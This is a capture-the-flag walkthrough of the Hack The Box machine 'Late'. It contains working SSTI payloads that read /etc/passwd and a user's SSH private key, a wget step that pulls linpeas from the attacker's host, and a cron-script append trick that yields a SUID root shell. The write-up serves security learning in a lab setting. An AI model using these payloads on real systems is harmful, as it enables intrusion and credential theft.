Summary

Late is a Linux machine and is considered as an easy box by the hack the box. On this box, we will begin with a basic port scan and move laterally based on the findings. Then we will enumerate HTTP services and hunt vulnerabilities present on the web page.  Laterally, we will exploit server-side template injection (SSTI) vulnerability to gain an initial foothold in the target system. Then we will be tasked to gain root access where we will exploit it by abusing file ownership and cron job.

Table of Content

Initial Access

• Nmap TCP Port Scan
• Web Page Enumeration
• Vulnerability Assessment
• Server-Side Template Injection Exploitation
• User Flag

Privilege Escalation

• Find Privilege Escalation Vectors
• Escalate Privilege via owned file set to cron job
• Root Flag

Let’s exploit it step by step.

Initial Access

We are going to start the assessment with regular TCP/IP port scanning.

Nmap TCP Port Scan

We begin with the port scan where we are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool comes with Kali Linux. To perform a port scan, we have used –sV flag which performs a service version against the target machine.

Flags features:

-sV:  Attempts to determine the service version

nmap -sV 10.129.227.134

From the nmap scan, we have found there were only two ports open, which is port 22 and port 80. As usual HTTP service is running on port 80 and the SSH service is running on port 22.  HTTP service is used for webhosting where SSH service is used for remote connection. We did not find any vulnerabilities on SSH version 7.6p1 and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to. Instead of thinking about the SSH bruteforce let’s start enumerating port 80.

Web Page Enumeration

We enumerate port 80 and access it over the browser shown an Image related website. Nothing looks interesting here on the web page, we saw a heading “Worlds Simplest Image Utilities” that works for graphics and the title “late” which can be a potential domain name.

Then we checked the source code of the web page as many times we find sensitive information in the comment section and URLs. There we found a domain name http://images.late.htb/.

Next, we added the domain name into the /etc/hosts file in our attacking machine to enumerate further about Domain. You can use any text editor to add the domain to hosts file.

Vulnerability Assessment

After adding it to the hosts file, we accessed http://image.late.htb over the browser and we got a new web page where we can upload images. After analysing the functionalities of the web page, we found that the web page converts any image into text format. For example, if we have any text on an image then it will convert it to text format.

Then we decided to check how it functions and also created a Server-Side Template Injection (SSTI) payload and saved it as payload.png which makes sense as it converts images to text. We can write a payload using text editor and take a screenshot and save it as png format as well.

{{7*7}}

After creating our payload, we uploaded it to the web page. You can click on the browse tab and upload it from the directory you have kept our payload.png file. We can see Convertio CMS is being used to convert image file to text files. Convertio is a popular open-sourced image-to-text convertor.

Once we convert our file, we can download it by clicking on download tab and it will be saved as results.txt in our download directory. After downloading the file, we checked the result and found that Convertio is vulnerable to Server-Side Template Injection (SSTI). If we get the sum of the given argument, then it is quite promising that the server is vulnerable to SSTI. For example, we have given {{7*7}}in our payload and received 49 as the sum of 7*7.

 A server-side template injection (SSTI) vulnerability occurs when user data is embedded directly in a template and then interpreted by the template engine. This allows attackers to inject arbitrary directives to manipulate the template engine.

Then we decided to check the users in the target system. The user file is available in the /etc/passwd file. SSTI works similarly as Local File inclusion vulnerability, but it has a different syntax which is available here:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

We created a new payload to read /etc/passwd file from the target system and repeated the same process.

{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}

Then we uploaded it and converted it to text format as we did earlier.

This time we got /etc/passwd file contents of the target system. After having a closer look into the passwd file, we found a user svc_acc present there. Now, we can perform couple of attacks against the target such as SSH service bruteforce or retrieving id_rsa file from the target host. When SSH bruteforce failed, we decided to retrieve the id_rsa file from the user .ssh directory.

Server-Side Template Injection (SSTI) Exploitation

The id_rsa file is in the /home/svc_acc/.ssh directory named id_rsa. With the id_rsa private key, we can log in as svc_acc user without a password if the id_rsa key is not protected with a password. Then we created another payload where we have given the file path of the id_rsa and saved it as payload.png.

{{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read() }}

When we upload our new payload, it will read the contents of id_rsa key and save it as a results.txt file. We retrieved the RSA key by downloading converted file. Now, we have RSA key, so we are in the position to try log-in via SSH service with the retrieved RSA key.

User Flag

We saved RSA key as key and given 600 file permission. RSA key works with 600 and 400 file permission. If we do not give permission, then it will throw some errors to establish a connection with the remote host. 600 permissions mean that only the owner of the file has full read and write access to it. Once file permission is set to 600, no one else can access the file. We can give permission to file by chmod 600 <filename>.

chmod 600 key

Then we can log in to the target system using RSA key as svc_acc. As we are going to establish a connection to the target host, we must add -i and pass RSA key to authenticate.

ssh -i key svc_acc@10.129.227.134

After logging in to the target system we can grab the user flag from the svc_acc home directory.

cat user.txt

Next, we need to escalate to a privilege account, so we transferred linpeas.sh script to the target system /tmp directory as any user has full permission on this directory. To transfer linpeas.sh into the target system we have to setup a python server in the kali machine. Here we have set up a python server on port 80, now we can download script with wget from target side.

In Kali:

python3 -m http.server 80

On Target:

wget 10.10.14.31/linpeas.sh

Once it is downloaded in the target system, we will give full permission to the linpeas.sh and execute it. Script will enumerate possible privilege escalation vectors present in the target system.

chmod  777 linpeas.sh
./linpeas.sh

Privilege Escalation

Privilege escalation is the process of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Privilege escalation can be used by attackers to gain access to more system functions and data than intended by the root user. In some cases, privilege escalation can allow attackers to gain complete control of the system.

Find Privilege Escalation Vectors

After reviewing the linpeas.sh output, we found that the current user has ownership permission on the ssh-alrert.sh script. We can perform various attacks if the file is writable by the low-privileged user and owned by the root user. Before coming to any conclusion, let’s enumerate what the script does.

Escalate Privilege via owned file set to cron job

The script must be running as a cron job, which means it is automated to perform some tasks on events or set for some jobs.  For example, when someone try to log in via SSH then it will send an alert to the root user. We have ownership of the script but unfortunately, we cannot modify it.

Root Flag

Being an owner of the script, we can append anything to the script, which means we cannot delete or modify existing content, but we have the privilege to add more to it. So, if the script executed by root next time it will also execute the task we have added.

Let’s append /bin/bash binary and give SUID permission. Now if we log in via SSH service then it will create a bin/bash binary in the svc_acc home directory with SUID set. If we execute it, then it will spawn a root shell. Once we get the root shell then we can grab the root flag from the/root/root directory.

Conclusion:

This machine was fun and was a great source of learning, where we learned and explored so many things such as TCP port scan, service enumeration, Server-Side Template Injection vulnerability assessment and exploitation, file transfer, file permissions, cron script analysis and performed privilege escalation by exploiting file permission and cron job.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

Author: Subhash Paudel is a Penetration Tester and a CTF player who has a keen interest in various technologies and loves to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: Linkedin and Twitter